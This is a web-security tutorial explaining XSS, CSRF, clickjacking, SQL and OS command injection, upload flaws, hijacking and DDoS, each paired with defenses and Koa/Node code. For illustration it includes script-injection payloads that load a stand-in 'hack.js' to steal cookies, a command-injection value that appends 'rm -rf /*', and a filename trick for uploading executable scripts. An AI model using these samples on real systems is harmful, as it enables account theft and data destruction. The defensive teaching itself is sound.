Common Web attack modes

XSS attack – stealing login state information

Definition: a cross-site scripting (XSS) attack injects attacker-controlled JavaScript into a web page, usually to steal accounts (the session cookie) and data from the users who view it.

Classification

  • Reflected: the payload travels in the request (here a query parameter) and is echoed straight back into the response
http://localhost:3000/?from=<script src="http://localhost:4000/hack.js"></script>   // hide the domain behind a short link, e.g. https://dwz.cn/
A) generate a short-link URL; b) get the user to click it: the injected script steals the login state, and the attacker loads the stolen cookies into their own browser to impersonate the user
  • Stored: the payload is saved in the DB and injected every time it is read back
<script src="http://localhost:4000/hack.js"></script>   // stored XSS: submitted through a field the site saves and later renders

Once injected, the payload persists: every logged-in user who views the page sends their information to the hacker.

To make the two demos above work in a browser that still has the legacy XSS auditor, the demo server switches it off:

ctx.set('X-XSS-Protection', 0)   // disable the browser's XSS filter

0 disables the filter; 1 enables it (historically the default), in which case a browser that detects a reflected script sanitizes the page by removing the unsafe parts. Do not count on this header as a defense: Chromium-based browsers removed their XSS auditor in 2019 and Firefox never implemented one, so in current browsers the header does nothing.

Defense strategy

1. Content security policy

Content Security Policy (CSP) is an additional Security layer designed to help detect and mitigate certain types of attacks, including cross-site scripting XSS and data injection attacks

CSP is essentially a whitelist: the developer tells the browser explicitly which sources may be loaded and executed, and the browser refuses everything else. We only need to configure the rules, for example:

Content-Security-Policy: default-src 'self'        // only load resources from the page's own origin
Content-Security-Policy: img-src https://*          // images may come from any HTTPS source
Content-Security-Policy: child-src 'none'           // no frames or workers from any source
ctx.set('Content-Security-Policy', "default-src 'self'")   // the Koa equivalent; the whole policy is one header value

2. Escape characters

EJS escaping tips

<% code %>    executes JavaScript and outputs nothing
<%= code %>   outputs code with HTML escaping
<%- code %>   outputs code without escaping (never use it with untrusted input)

3. Blacklist

User input can never be trusted. The most common approach is to escape on input and, above all, on output: quotes, angle brackets, slashes and the ampersand, encoded for the context (HTML text, attribute, URL) the value ends up in.
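The escaping described above, as an added example that is not part of the original page. It uses the same character set the text names plus the ampersand, and goes one step beyond the text by showing the URL context, where escaping alone does not help and the scheme has to be allowlisted. Function names and the sample comment are this example's own.

```javascript
// Added example (not from the original page): output escaping per HTML context.
// The escape map is the one the page describes (quotes, angle brackets, slashes)
// plus '&', which must be escaped or the other entities can be undone on decoding.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '/': '&#x2F;',
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Text and attribute context: escaping turns the stored payload into inert markup.
function renderComment(author, text) {
  return `<div class="comment" data-author="${escapeHtml(author)}">` +
    `<b>${escapeHtml(author)}</b>: ${escapeHtml(text)}</div>`;
}

// URL context (beyond the page's text): escaping does not stop javascript: URLs,
// so the scheme is allowlisted first and anything else becomes a harmless link.
function renderLink(href, label) {
  const safeHref = /^https?:\/\//i.test(href) ? href : 'about:blank';
  return `<a href="${escapeHtml(safeHref)}">${escapeHtml(label)}</a>`;
}

// Constructed sample input: the stored-XSS payload from the page.
const SAMPLE_PAYLOAD = '<script src="http://localhost:4000/hack.js"></script>';
```

Escaping is applied at the moment of output, not on storage: the same value may be rendered into HTML, into a JSON response and into a log, and each needs its own encoding.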

4. Whitelist – the xss library

A sanitizer such as the xss npm package keeps only the tags and attributes on its whitelist and escapes everything else, which suits fields that must accept some HTML:

const xss = require('xss')
let html = xss('<h1>XSS Demo</h1>')   // tags and attributes not on the whitelist are escaped

5. HttpOnly cookies

This is the most effective way to stop an XSS payload from stealing the user's cookies. When the application sets its session cookie with the HttpOnly attribute, document.cookie cannot read it, so injected JavaScript cannot send it to the attacker. Note what it does not do: the injected script still runs inside the user's session and can make requests as the user, so HttpOnly limits the damage of XSS rather than preventing it.

response.addHeader('Set-Cookie', 'uid=112; Path=/; HttpOnly')

CSRF attack – using the login state

Definition: cross-site request forgery uses the user's logged-in identity to perform an operation on the user's behalf, without the user's knowledge. It needs three things:

  • The user has logged in to site A and the browser holds A's cookie
  • Without logging out of A (so the cookie is still valid), the user visits lure site B built by the attacker; B makes the browser send requests to A, and the browser attaches A's cookie
  • Site A does no CSRF defense

Defenses

  • Referer check. Browsers strip the Referer on an HTTPS to HTTP downgrade and a page can suppress it with Referrer-Policy, so a check that merely logs the value, or that passes when the header is missing, is useless. Reject state-changing requests whose Referer (or better, the Origin header) is absent or belongs to another origin:
app.use(async (ctx, next) => {
    const referer = ctx.request.header.referer
    console.log('Referer', referer)
    // 'https://example.com/' stands in for this site's own origin
    if (!['GET', 'HEAD', 'OPTIONS'].includes(ctx.method) &&
        !(referer && referer.startsWith('https://example.com/'))) {
        ctx.throw(403)
    }
    await next()
})
  • Verification code: a human-machine check (graphical CAPTCHA) or an SMS code, which the attacker's page cannot supply
  • Cookie-value hash (anti-CSRF token): when the attacker triggers a request to trusted site A, the browser does attach A's cookie, but A does not identify the action by the cookie alone. It also requires something in the submitted content that only a real user's page can produce: a CAPTCHA or SMS code, or a pseudo-random token derived from the cookie value (for example a keyed hash of it) that the server re-derives and compares. The attacker's page cannot read A's cookie, so it cannot compute the token.

Clickjacking

Definition: click hijacking is a visual-deception attack. The attacker embeds the target site in an iframe on their own page, makes the iframe transparent, and places a visible button underneath it so that the user's click actually lands on the hidden target page.

Defenses

  • X-Frame-Options

X-Frame-Options is an HTTP response header that is well supported in modern browsers and exists specifically to defend against iframe-based clickjacking. It has three values:

  1. DENY: the page may not be displayed in a frame at all
  2. SAMEORIGIN: the page may be framed only by pages from the same origin
  3. ALLOW-FROM uri: the page may be framed by the named origin; this value is deprecated and ignored by current browsers, so use the CSP frame-ancestors directive when specific framers must be allowed
ctx.set('X-Frame-Options', 'DENY')
  • JS way (frame busting)
<head>
  <style id="click-jack">
    html { display: none !important; }
  </style>
</head>
<body>
  <script>
    // self is the current window; top is the outermost window. They are the same
    // only when the page is not inside a frame.
    if (self == top) {
      var style = document.getElementById('click-jack')
      style.parentNode.removeChild(style)   // reveal the page
    } else {
      top.location = self.location          // framed: navigate the top window to this page
    }
  </script>
</body>

What this code does: the page starts hidden; when loaded inside an iframe it stays hidden and tries to escape the frame, and only as the top-level window does it reveal its content. A framing page can defeat this with the iframe sandbox attribute (which blocks top navigation), so treat the script as a fallback and rely on X-Frame-Options or CSP frame-ancestors.

SQL injection

Definition: user input is spliced into a SQL statement so that the attacker's text is executed as part of the query. This attacks the database directly and enables database-level operations such as reading or modifying data. The standard defense is parameterized queries, which keep data out of the statement text.

File upload vulnerability

Definition: a user uploads a file that is really an executable script (usually PHP), often disguised by exploiting file-naming rules (for example Windows drops a trailing dot or space from a name, so a check on the uploaded name does not see the final .php), and then runs commands on the server by requesting that script.

OS injection

The definition of OS command injection parallels SQL injection: SQL injection targets the database, OS command injection targets the operating system. The attacker gets the web application to execute operating system commands it never meant to run. Any code path that reaches a shell carries the risk: if the shell is invoked carelessly, the command the attacker inserted is executed.

// Take Node.js as an example: an endpoint clones a GitHub repo chosen by the user
const exec = require('mz/child_process').exec
let params = { repo: ctx.query.repo }   // user-supplied, e.g. from the query string
exec(`git clone ${params.repo} /some/path`)
// a malicious value: https://github.com/xx/xx.git && rm -rf /* &&

Request hijacking

  • DNS hijacking

As the name implies, some step of DNS resolution is tampered with so that the name resolves to an IP the user did not expect. For example: the user asks for www.baidu.com -> the Wi-Fi's DHCP hands out a DNS server -> that DNS server is controlled or poisoned -> the name resolves to the hacker's server, while the domain name the user sees is unchanged.

  • HTTP hijacking

Carrier (ISP) hijacking: content is injected into or replaced in plaintext HTTP responses in transit. At this point the realistic fix is to upgrade to HTTPS, with HSTS so that the first request is not downgraded either.

DDoS

Definition: DDoS is not a single attack but the general name for a family of them. There are more than ten kinds, new methods keep being invented, and every link in a site's operation can be a target: knock out one link and the whole chain stops, which is the denial-of-service goal. A common member of the family is the CC attack (Challenge Collapsar), which simply sends a large number of normal-looking requests, exceeding the server's capacity and taking it down.

  • SYN Flood

This attack exploits the TCP handshake: it sends a large number of TCP SYN ("initial connection request") packets to the target with spoofed source IP addresses. The target answers each with SYN-ACK and waits for the final ACK of the handshake, which never comes, and the half-open connections exhaust its resources. On Linux, SYN cookies (net.ipv4.tcp_syncookies) let the kernel answer without holding per-connection state.

  • HTTP Flood

This attack is like many different computers hitting the refresh button in a browser at the same time: the server is flooded with HTTP requests and cannot serve legitimate ones.

Defenses

  • A backup site

The backup site does not have to be fully functional; a fully static copy that can be browsed meets the need. At the very least it should be able to show an announcement that the site is out of order and being repaired.

  • HTTP request interception; a high-defense (DDoS scrubbing) IP from a reliable carrier

  • Hardware server firewall

  • Bandwidth expansion + CDN, to raise the attacker's cost
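The application-side half of "HTTP request interception" against an HTTP flood, as an added example that is not code from the original page: a per-client token-bucket limiter and the Koa middleware that answers 429 instead of doing real work. It assumes Koa's ctx.ip (with app.proxy set only when a trusted proxy sits in front, so X-Forwarded-For cannot be forged by the client); capacity and refill values are illustrative, and the clock is injectable so the test can drive it.

```javascript
// Added example (not from the original page): per-client token-bucket rate limiting.
// Assumptions: Koa ctx API; ctx.ip is trustworthy (app.proxy only behind a trusted proxy);
// the capacity/refill numbers are illustrative.
class TokenBucketLimiter {
  constructor({ capacity = 100, refillPerSecond = 20, maxClients = 100000, now = () => Date.now() } = {}) {
    this.capacity = capacity;                 // burst a client may make from idle
    this.refillPerSecond = refillPerSecond;   // sustained rate per client
    this.maxClients = maxClients;             // cap on tracked clients so the table itself cannot be flooded
    this.now = now;                           // injectable clock (ms)
    this.buckets = new Map();
  }

  // Consumes one token for clientKey and returns true, or returns false if it is out of tokens.
  allow(clientKey) {
    const t = this.now();
    let bucket = this.buckets.get(clientKey);
    if (!bucket) {
      if (this.buckets.size >= this.maxClients) {
        this.buckets.delete(this.buckets.keys().next().value);   // Map keeps insertion order: drop the oldest
      }
      bucket = { tokens: this.capacity, last: t };
      this.buckets.set(clientKey, bucket);
    }
    const elapsedSeconds = Math.max(0, (t - bucket.last) / 1000);
    bucket.tokens = Math.min(this.capacity, bucket.tokens + elapsedSeconds * this.refillPerSecond);
    bucket.last = t;
    if (bucket.tokens >= 1) {
      bucket.tokens -= 1;
      return true;
    }
    return false;
  }
}

// Koa middleware: reject a flooding client cheaply, before any database or render work.
function rateLimit(limiter) {
  return (ctx, next) => {
    if (!limiter.allow(ctx.ip)) {
      ctx.status = 429;
      ctx.set('Retry-After', '1');
      ctx.body = 'Too Many Requests';
      return;
    }
    return next();
  };
}

// Usage: app.use(rateLimit(new TokenBucketLimiter({ capacity: 50, refillPerSecond: 10 })))
```

This state lives in one process; a fleet needs a shared store for the buckets or a limiter at the load balancer. It also only helps once packets reach the application: a SYN flood or a bandwidth-saturating flood is over before the middleware runs, which is what the high-defense IP and scrubbing service in the list above are for.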